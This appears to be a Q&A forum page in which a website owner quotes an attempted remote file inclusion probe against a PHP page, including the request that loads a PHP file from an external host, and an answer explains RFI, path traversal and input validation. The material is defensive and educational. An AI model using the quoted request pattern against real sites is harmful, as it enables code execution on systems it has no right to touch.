Home/ Questions/Q 4324262
In Process

The Archive Base Latest Questions

Editorial Team
  • 0
Asked: 2026-05-21T09:06:31+00:00

A guy called ShiroHige is trying to hacking my website. He tries to open

  • 0

A guy called ShiroHige is trying to hacking my website.

He tries to open a page with this parameter:

mysite/dir/nalog.php?path=http://smash2.fileave.com/zfxid1.txt???

If you look at that text file it is just a die(),

<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>

So what exploit is he trying to use (WordPress?)?

Edit 1:

I know he is trying use RFI.

Is there some popular script that are exploitable with that (Drupal, phpBB, etc.)?

Share

Leave an answer

You must login to add an answer.

Need An Account,

1 Answer

  1. Editorial Team

    The vulnerability the attacker is aiming for is probably some kind of remote file inclusion exploiting PHP’s include and similar functions/construct that allow to load a (remote) file and execute its contents:

    Security warning

    Remote file may be processed at the remote server (depending on the file extension and the fact if the remote server runs PHP or not) but it still has to produce a valid PHP script because it will be processed at the local server. If the file from the remote server should be processed there and outputted only, readfile() is much better function to use. Otherwise, special care should be taken to secure the remote script to produce a valid and desired code.

    Note that using readfile does only avoids that the loaded file is executed. But it is still possible to exploit it to load other contents that are then printed directly to the user. This can be used to print the plain contents of files of any type in the local file system (i.e. Path Traversal) or to inject code into the page (i.e. Code Injection). So the only protection is to validate the parameter value before using it.

    See also OWASP’s Development Guide on “File System – Includes and Remote files” for further information.

    • 0